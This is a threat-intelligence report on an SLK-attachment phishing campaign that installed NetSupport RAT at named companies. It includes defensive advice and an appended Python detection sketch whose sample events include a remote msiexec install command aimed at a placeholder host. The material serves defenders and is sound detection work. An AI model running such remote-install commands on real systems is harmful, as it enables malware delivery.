At Least 13 Companies Targeted by new Phishing Attacks

Researchers at MalwareHunterTeam have discovered a new phishing campaign targeting at least 13 companies, some of them very well known. The campaign uses SLK (Symbolic Link) file attachments, a format that Microsoft Excel uses to share data between spreadsheets. The emails are sent from accounts that try to impersonate clients or company vendors. If an employee opens the SLK file and clicks the “Enable Content” button as instructed by the attackers, commands in the SLK file cause Excel to save a .BAT (batch) file to the %TEMP% folder and execute it. The batch file uses msiexec.exe to download an installer file from a remote server and install malware. Once the installer has been executed, the employee’s workstation is infected with NetSupport RAT. Access to corporate networks is a potential goldmine for attackers: it would allow them to steal corporate secrets and financial documents, launch ransomware attacks, and carry out a multitude of other damaging attacks. The 13 companies that were originally targeted are:

  • A2B Australia Limited
  • Asarco LLC
  • AusNet Services
  • Bega Cheese
  • Boc Group Inc
  • Glad Products Company
  • Hasbro
  • Hydratight
  • Iridium
  • Messer LLC
  • MutualBank
  • Pact Group
  • Sappi North America

On February 17th, MalwareHunterTeam reported yet another company, Beach Energy Limited, targeted by the same attack. It is likely that more major companies across multiple industry segments will continue to be targeted as long as the attack technique is effective.

Analyst Notes

With phishing emails being the primary method of malware transmission, there are several things that companies can do to protect employees, brand, and data. Include SLK file inspection as part of email threat scanning filters. Use Endpoint Detection and Response (EDR) software that detects attacker behaviors such as batch files executed by Microsoft Word or Excel, or msiexec used to install a file from a remote server. If an email with attachments is unexpected, or is sent from an email address not normally used by the company it claims to be from, the recipient should contact the sender’s company before opening the attachment, using the corporate phone number or email address, to verify that they sent the email. Do not use the sender’s email address, as it could be held by an attacker.
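The two behaviors named above can be expressed as rules over process-creation telemetry. The sketch below is an added example, not code from MalwareHunterTeam or from any EDR product; the event field names (`image`, `parent_image`, `command_line`), the rule names and the sample events are all constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

OFFICE_PARENTS = {"excel.exe", "winword.exe"}
BAT_RE = re.compile(r"\.bat\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(path).name.lower()

def classify(event):
    """Return the names of the rules that one process-creation event matches."""
    child = image_name(event["image"])
    parent = image_name(event["parent_image"])
    cmd = event["command_line"]
    hits = []
    # Rule 1: Word or Excel starts a process whose command line names a .bat file.
    if parent in OFFICE_PARENTS and BAT_RE.search(cmd):
        hits.append("office_spawns_batch")
    # Rule 2: msiexec is handed an http(s) URL instead of a local package.
    if child == "msiexec.exe" and URL_RE.search(cmd):
        hits.append("msiexec_remote_install")
    return hits

def scan(events):
    """Return (index, rules) for every event that matches at least one rule."""
    results = []
    for i, event in enumerate(events):
        rules = classify(event)
        if rules:
            results.append((i, rules))
    return results

# Constructed sample events (hypothetical hosts, users and paths).
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": OFFICE,
     "command_line": r'cmd.exe /c "C:\Users\alice\AppData\Local\Temp\a.bat"'},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "msiexec /i http://example.invalid/pkg.msi /q"},
    {"image": OFFICE, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"EXCEL.EXE" "C:\Users\alice\Documents\q1.xlsx"'},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"msiexec /i C:\installers\app.msi"},
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        print(idx, rules, SAMPLE_EVENTS[idx]["command_line"])
```

The last two events are benign controls: a spreadsheet opened from Explorer and a local MSI install should produce no alert.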